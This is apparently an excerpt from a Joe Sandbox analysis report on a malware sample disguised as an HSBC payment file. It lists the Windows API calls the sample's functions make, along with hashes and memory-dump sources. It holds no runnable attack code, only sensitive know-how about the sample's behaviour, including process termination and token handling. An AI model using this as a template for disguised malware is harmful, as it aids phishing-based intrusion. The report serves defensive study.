                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3311875123-0
                                                                                                                                • Opcode ID: a6b73778cc865e2a8cdcb0e8bb86d15b14f8ffef8fe7ad9cf9903b81675413e0
                                                                                                                                • Instruction ID: 7806389331a8557591fdbfe20ca263e6e8bf30f1cbe43177c112654e3086222f
                                                                                                                                • Opcode Fuzzy Hash: a6b73778cc865e2a8cdcb0e8bb86d15b14f8ffef8fe7ad9cf9903b81675413e0
                                                                                                                                • Instruction Fuzzy Hash: E251D270A40209EFDF21EF68D898BADBBF5FF46316F108129E81197692D77C8906CB51
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623
                                                                                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 0072179A
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 007217FE
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0072181B
                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0072182C
                                                                                                                                • EndPaint.USER32(?,?), ref: 00721876
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1827037458-0
                                                                                                                                • Opcode ID: 7b94ad11a43fd1dfb1b30559c7e13923f4a41984c16338384c2f412e1b8d6875
                                                                                                                                • Instruction ID: 2173949933fd06e08844c344e312e9aef5cf6e4b5245e680f718c6e9c4491ede
                                                                                                                                • Opcode Fuzzy Hash: 7b94ad11a43fd1dfb1b30559c7e13923f4a41984c16338384c2f412e1b8d6875
                                                                                                                                • Instruction Fuzzy Hash: A241AE30500754EFD710DF24DCC8BBA7BE8FB5A724F144668F9A48B2A1C778A845DB62
                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(007E57B0,00000000,011950C0,?,?,007E57B0,?,007AB5A8,?,?), ref: 007AB712
                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 007AB736
                                                                                                                                • ShowWindow.USER32(007E57B0,00000000,011950C0,?,?,007E57B0,?,007AB5A8,?,?), ref: 007AB796
                                                                                                                                • ShowWindow.USER32(00000000,00000004,?,007AB5A8,?,?), ref: 007AB7A8
                                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 007AB7CC
                                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007AB7EF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 642888154-0
                                                                                                                                • Opcode ID: 8977eae6ca4e3e1187791315fa42d528acba948e45cbac732d56239bd020917f
                                                                                                                                • Instruction ID: 0ae0291e6d0901df3debbd560fa5aec9463a849a328fffd0238780bb3d2a95c6
                                                                                                                                • Opcode Fuzzy Hash: 8977eae6ca4e3e1187791315fa42d528acba948e45cbac732d56239bd020917f
                                                                                                                                • Instruction Fuzzy Hash: F8416034601240AFDB25CF24C499B947BE1FB86310F5882BAE9488F6A3C779AC56CB51
                                                                                                                                APIs
                                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00794E41,?,?,00000000,00000001), ref: 007970AC
                                                                                                                                  • Part of subcall function 007939A0: GetWindowRect.USER32(?,?), ref: 007939B3
                                                                                                                                • GetDesktopWindow.USER32 ref: 007970D6
                                                                                                                                • GetWindowRect.USER32(00000000), ref: 007970DD
                                                                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0079710F
                                                                                                                                  • Part of subcall function 00785244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007852BC
                                                                                                                                • GetCursorPos.USER32(?), ref: 0079713B
                                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00797199
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4137160315-0
                                                                                                                                • Opcode ID: f1e1e4181e0b4bdb11ce68b72ee5f60d01505161b4744859982be359ead40255
                                                                                                                                • Instruction ID: 33a4b6969b6719c44724e87188b4ce125f385bb29e616ff3678ceee9acf64db8
                                                                                                                                • Opcode Fuzzy Hash: f1e1e4181e0b4bdb11ce68b72ee5f60d01505161b4744859982be359ead40255
                                                                                                                                • Instruction Fuzzy Hash: 98310472508309ABCB24EF54D849F9BB7E9FFC9314F000919F48597191CB38EA08CB96
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 007780A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007780C0
                                                                                                                                  • Part of subcall function 007780A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007780CA
                                                                                                                                  • Part of subcall function 007780A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007780D9
                                                                                                                                  • Part of subcall function 007780A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007780E0
                                                                                                                                  • Part of subcall function 007780A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007780F6
                                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,0077842F), ref: 007788CA
                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007788D6
                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 007788DD
                                                                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 007788F6
                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,0077842F), ref: 0077890A
                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00778911
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3008561057-0
                                                                                                                                • Opcode ID: b0daf58389a5c762ba2d8882de04b94aad5baa31403b24ea7d69d96f94881aa3
                                                                                                                                • Instruction ID: f713ba195cb11ca32f8170d198611268abb3d54169ebc9bd7b99248d46a346ac
                                                                                                                                • Opcode Fuzzy Hash: b0daf58389a5c762ba2d8882de04b94aad5baa31403b24ea7d69d96f94881aa3
                                                                                                                                • Instruction Fuzzy Hash: A611AF31651209FFDF509FA4DC09BBE7B68EB85351F10C028E99997210CB3AAD00DF62
                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007785E2
                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 007785E9
                                                                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007785F8
                                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 00778603
                                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00778632
                                                                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00778646
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1413079979-0
                                                                                                                                • Opcode ID: 15d927ab8d421becf6f09306eb15da98b5074e54fc012b84521065f5a35ec5ad
                                                                                                                                • Instruction ID: ca4c24a1386c1f28c999feacb50d788c2495c61c9034989a25fefdcb9c90f274
                                                                                                                                • Opcode Fuzzy Hash: 15d927ab8d421becf6f09306eb15da98b5074e54fc012b84521065f5a35ec5ad
                                                                                                                                • Instruction Fuzzy Hash: AD115C72540209ABDF018FA4DD49BDE7BA9EF49344F048064FE04A2161C7798D60DB61
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(00000000), ref: 0077B7B5
                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0077B7C6
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0077B7CD
                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0077B7D5
                                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0077B7EC
                                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0077B7FE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                • Opcode ID: 9d017dc68154a3b2a5dcdf264163cd28cc8bec193c864735a5bb30db0e341c04
                                                                                                                                • Instruction ID: fec0bf978dd809e84cacea3162429169609f4eaf8c839c4d434e40dd354b9bd5
                                                                                                                                • Opcode Fuzzy Hash: 9d017dc68154a3b2a5dcdf264163cd28cc8bec193c864735a5bb30db0e341c04
                                                                                                                                • Instruction Fuzzy Hash: E5018475E00209BBEF109BE69C49B5EBFB8EB89351F008076FA08A7291D6749C00CF91
                                                                                                                                APIs
                                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00740193
                                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 0074019B
                                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007401A6
                                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007401B1
                                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 007401B9
                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 007401C1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Virtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4278518827-0
                                                                                                                                • Opcode ID: 4fd732c8a6342e269fae53997258d880f1cdde691132cb4d6c3b83c21fafd411
                                                                                                                                • Instruction ID: 685d4c9aedf825331d65fec0b1493d44f1ee6c59dc3749111009f8899a73f457
                                                                                                                                • Opcode Fuzzy Hash: 4fd732c8a6342e269fae53997258d880f1cdde691132cb4d6c3b83c21fafd411
                                                                                                                                • Instruction Fuzzy Hash: 68016CB0901759BDE3008F5A8C85B52FFA8FF59354F00411BE15C47941C7F5A864CBE5
                                                                                                                                APIs
                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007853F9
                                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0078540F
                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0078541E
                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0078542D
                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00785437
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0078543E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 839392675-0
                                                                                                                                • Opcode ID: 2b3e96bf1490858b58e758a256bcb7903063a1b8588b64266cc7f5bd7aef5944
                                                                                                                                • Instruction ID: 112b3868f22b926845a73aef411f400dd9f87b699b7392334037bb785b696de2
                                                                                                                                • Opcode Fuzzy Hash: 2b3e96bf1490858b58e758a256bcb7903063a1b8588b64266cc7f5bd7aef5944
                                                                                                                                • Instruction Fuzzy Hash: 1CF01D32241558BBE7215BE2DC0DEAB7A7CEBC7B11F004169FA04D105196A91A0186B9
                                                                                                                                APIs
                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00787243
                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,00730EE4,?,?), ref: 00787254
                                                                                                                                • TerminateThread.KERNEL32(00000000,000001F6,?,00730EE4,?,?), ref: 00787261
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00730EE4,?,?), ref: 0078726E
                                                                                                                                  • Part of subcall function 00786C35: CloseHandle.KERNEL32(00000000,?,0078727B,?,00730EE4,?,?), ref: 00786C3F
                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00787281
                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00730EE4,?,?), ref: 00787288
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                • Opcode ID: 91b2c7cd35ac62536f2fe4c8c9d5fed4ebd1dbc9ddbfea80becdad159f431893
                                                                                                                                • Instruction ID: 2174be6014fd009612239c3a0dd3f8c39e6122e1c224bfb014a955c2dd4babc0
                                                                                                                                • Opcode Fuzzy Hash: 91b2c7cd35ac62536f2fe4c8c9d5fed4ebd1dbc9ddbfea80becdad159f431893
                                                                                                                                • Instruction Fuzzy Hash: 16F05E36580612EBD7622BA4ED4CAEE7739FF86702B104531F503910E0DB7E5801CB65
                                                                                                                                APIs
                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0077899D
                                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 007789A9
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 007789B2
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 007789BA
                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 007789C3
                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 007789CA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 146765662-0
                                                                                                                                • Opcode ID: 9ab8ec639aa8b211b20c3da97d477db76047b278b91c9a3feb2fd2e680dae82c
                                                                                                                                • Instruction ID: 1e0f9e00f1c58845619aaaee6a4c18a825a487c4364254ba2885794ad36ff462
                                                                                                                                • Opcode Fuzzy Hash: 9ab8ec639aa8b211b20c3da97d477db76047b278b91c9a3feb2fd2e680dae82c
                                                                                                                                • Instruction Fuzzy Hash: 35E05276104505FFDB011FE5EC0C95ABF69FBCA762B508631F21981470CB3A9861DF58
                                                                                                                                APIs
                                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007B2C7C,?), ref: 007776EA
                                                                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007B2C7C,?), ref: 00777702
                                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,007AFB80,000000FF,?,00000000,00000800,00000000,?,007B2C7C,?), ref: 00777727
                                                                                                                                • _memcmp.LIBCMT ref: 00777748
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                                                                • String ID: ,,{
                                                                                                                                • API String ID: 314563124-821077388
                                                                                                                                • Opcode ID: 82d6e85cda5e35b07252caaa982675004da55439b63232a100d19347df85bd86
                                                                                                                                • Instruction ID: 1a264a3bb5224b316d39946f6d99de2f1f5cbf9f7e5f297a6d13a717ec9d5aa7
                                                                                                                                • Opcode Fuzzy Hash: 82d6e85cda5e35b07252caaa982675004da55439b63232a100d19347df85bd86
                                                                                                                                • Instruction Fuzzy Hash: 1D810B75A00109EFCF08DFA4C984EEEB7B9FF89355F208558E505AB250DB75AE06CB60
                                                                                                                                APIs
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00798613
                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00798722
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0079889A
                                                                                                                                  • Part of subcall function 00787562: VariantInit.OLEAUT32(00000000), ref: 007875A2
                                                                                                                                  • Part of subcall function 00787562: VariantCopy.OLEAUT32(00000000,?), ref: 007875AB
                                                                                                                                  • Part of subcall function 00787562: VariantClear.OLEAUT32(00000000), ref: 007875B7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                • API String ID: 4237274167-1221869570
                                                                                                                                • Opcode ID: c9908db92141134454542961a0569c14c648a65c3ec3ef8845d6f71f6e91258d
                                                                                                                                • Instruction ID: a89358e7b7fe910d7310a8bf04f9b0e5c24f3ec29f72353a0030dc7634dcde3e
                                                                                                                                • Opcode Fuzzy Hash: c9908db92141134454542961a0569c14c648a65c3ec3ef8845d6f71f6e91258d
                                                                                                                                • Instruction Fuzzy Hash: 70919F70608301DFCB40DF24D48495ABBF4EF8A714F14892EF98A8B362DB35E945CB92
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0073FC86: _wcscpy.LIBCMT ref: 0073FCA9
                                                                                                                                • _memset.LIBCMT ref: 00782B87
                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00782BB6
                                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00782C69
                                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00782C97
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
